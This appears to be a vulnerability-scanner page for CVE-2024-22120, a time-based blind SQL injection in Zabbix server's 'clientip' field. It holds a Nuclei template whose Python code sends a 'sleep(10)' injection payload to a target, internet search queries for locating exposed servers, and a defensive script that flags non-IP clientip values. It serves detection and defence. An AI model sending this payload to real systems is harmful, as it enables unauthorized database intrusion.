Zabbix Server - Time-Based Blind SQL injection
ID: CVE-2024-22120
Severity: critical
Author: CodeStuffBreakThings
Tags: cve,cve2024,authenticated,zabbix,sqli
Description

The Zabbix server can execute commands for configured scripts. After executing a command, an audit entry is added to the “Audit Log”. Due to the “clientip” field not being sanitized, it is possible to inject SQL into “clientip” and exploit a time-based blind SQL injection vulnerability.
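As an added example (not part of the template or of the Zabbix project code), the following Python script parses Zabbix protocol frames using the framing the template's check relies on (the ZBXD\x01 header followed by an 8-byte little-endian body length and a JSON body) and flags any "command" request whose clientip is not a literal IP address, which is exactly the validation the vulnerable field lacks. It can be pointed at captured traffic or used as the model for a server-side check. All frames, session ids, host ids and hostnames in it are constructed sample values, and the function names (build_frame, parse_frame, is_valid_clientip, audit_command_requests) are assumptions for illustration.

```python
import ipaddress
import json
import struct

# Zabbix protocol framing as used by the template's check: a 5-byte
# header, an 8-byte little-endian body length, then the JSON body.
ZBX_HEADER = b"ZBXD\x01"
PREFIX_LEN = len(ZBX_HEADER) + 8


def build_frame(payload: dict) -> bytes:
    """Encode a dict as a Zabbix protocol frame (header + length + JSON)."""
    body = json.dumps(payload).encode()
    return ZBX_HEADER + struct.pack("<q", len(body)) + body


def parse_frame(data: bytes) -> dict:
    """Decode one frame; rejects bad headers and truncated bodies."""
    if not data.startswith(ZBX_HEADER) or len(data) < PREFIX_LEN:
        raise ValueError("not a complete Zabbix protocol frame")
    (length,) = struct.unpack("<q", data[len(ZBX_HEADER):PREFIX_LEN])
    if length < 0:
        raise ValueError("negative body length")
    body = data[PREFIX_LEN:PREFIX_LEN + length]
    if len(body) != length:
        raise ValueError("truncated frame body")
    # json.JSONDecodeError is a ValueError subclass, so callers catch both at once
    return json.loads(body.decode())


def is_valid_clientip(value) -> bool:
    """Strict allow-list check: only a literal IPv4/IPv6 address passes."""
    if not isinstance(value, str):
        return False
    try:
        ipaddress.ip_address(value)
    except ValueError:
        return False
    return True


def audit_command_requests(frames) -> list:
    """Inspect frames and report 'command' requests whose clientip is not a
    plain IP address (the field the SQL injection abuses)."""
    findings = []
    for raw in frames:
        try:
            msg = parse_frame(raw)
        except ValueError:
            findings.append({"reason": "malformed frame", "clientip": None})
            continue
        if msg.get("request") != "command":
            continue  # only script execution requests carry clientip
        clientip = msg.get("clientip")
        if not is_valid_clientip(clientip):
            findings.append({"reason": "clientip is not an IP address",
                             "clientip": clientip,
                             "scriptid": msg.get("scriptid"),
                             "hostid": msg.get("hostid")})
    return findings


def sample_frames() -> list:
    """Constructed sample traffic (not captured data): a benign command
    request, one carrying the template's probe string, one with a hostname
    in the field, and one non-command request that is ignored."""
    sid = "<constructed session id>"
    return [
        build_frame({"request": "command", "sid": sid, "scriptid": "3",
                     "clientip": "192.0.2.10", "hostid": "10084"}),
        build_frame({"request": "command", "sid": sid, "scriptid": "3",
                     "clientip": "' + (select sleep(10)) + '", "hostid": "10084"}),
        build_frame({"request": "command", "sid": sid, "scriptid": "3",
                     "clientip": "monitor.example.test", "hostid": "10084"}),
        build_frame({"request": "active checks", "host": "agent01"}),
    ]


if __name__ == "__main__":
    for finding in audit_command_requests(sample_frames()):
        print(finding)
```

The check is deliberately an allow-list rather than a search for SQL keywords: anything that does not parse as an IP address is rejected, so the audit log can only ever receive values that are safe to store, and the same rule works as a detection over captured server traffic.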
YAML Source

id: CVE-2024-22120

info:
  name: Zabbix Server - Time-Based Blind SQL injection
  author: CodeStuffBreakThings
  severity: critical
  description: |
    The Zabbix server can execute commands for configured scripts. After executing a command, an audit entry is added to the "Audit Log". Due to the "clientip" field not being sanitized, it is possible to inject SQL into "clientip" and exploit a time-based blind SQL injection vulnerability.
  remediation: |
    Fixed in versions 6.0.28rc1, 6.4.13rc1, 7.0.0beta2
  reference:
    - https://support.zabbix.com/browse/ZBX-24505#/
    - https://github.com/W01fh4cker/CVE-2024-22120-RCE
    - https://nvd.nist.gov/vuln/detail/CVE-2024-22120
    - https://support.zabbix.com/browse/ZBX-24505
    - https://github.com/AboSteam/POPC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 9.1
    cve-id: CVE-2024-22120
    cwe-id: CWE-20
    epss-score: 0.00043
    epss-percentile: 0.09568
  metadata:
    max-request: 1
    vendor: zabbix
    product: zabbix
    shodan-query:
      - http.title:"zabbix-server"
      - cpe:"cpe:2.3:a:zabbix:zabbix"
      - http.favicon.hash:"892542951"
    fofa-query:
      - icon_hash=892542951
      - app="zabbix-监控系统" && body="saml"
      - title="zabbix-server"
    google-query: intitle:"zabbix-server"
  tags: cve,cve2024,authenticated,zabbix,sqli

variables:
  HOST: "{{Host}}"
  PORT: "{{Port}}"
  SID: "{{SID}}"
  HOSTID: "{{HOSTID}}"

code:
  - engine:
      - py
      - python3
    source: |
      import os, struct, socket
      from datetime import datetime

      # Target and request parameters are supplied through the template variables
      hostname=os.getenv('HOST')
      port=int(os.getenv('PORT'))
      sid=os.getenv('SID')
      hostid=os.getenv('HOSTID')

      # Zabbix protocol frame: "ZBXD\x01" header, 8-byte little-endian length, JSON body
      zbx_header = "ZBXD\x01".encode()
      message_json = "{\"request\": \"command\", \"sid\": \"" + sid + "\", \"scriptid\": \"3\", \"clientip\": \"' + (select sleep(10)) + '\", \"hostid\": \"" + hostid + "\"}"
      message_length = struct.pack('<q', len(message_json))
      message = zbx_header + message_length + message_json.encode()

      # Time the round trip: a delay of at least 10 s together with a valid
      # Zabbix header in the reply means the injected sleep() was executed
      before_query = datetime.now().timestamp()
      s = socket.socket()
      s.connect((hostname,port))
      s.send(message)
      response = s.recv(1024)
      s.close()
      after_query = datetime.now().timestamp()
      responsetime = after_query - before_query
      if responsetime >= 10 and zbx_header in response:
          print("Vulnerable to CVE-2024-22120")

    matchers:
      - type: word
        words:
          - "Vulnerable to CVE-2024-22120"
# digest: 490a004630440220373630574dc675bb0fb8395e3ba509866bb2524b66ba5af917e1c88af91ec0aa022072b103b17bfeb7f48ed7ba168e35269ee51e499398be47a1c2f98f07cb4cd689:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template detects the vulnerability by running the Python check above through Nuclei's code protocol against the Zabbix server port. The check is authenticated: HOST and PORT are filled from the target, but SID (a valid Zabbix session id) and HOSTID (the id of a host the session may run scripts on) must be supplied as template variables, for example with Nuclei's -var option, and code-protocol templates are only loaded when Nuclei is run with the -code flag.

$ nuclei -u "URL" -t "code/cves/2024/CVE-2024-22120.yaml"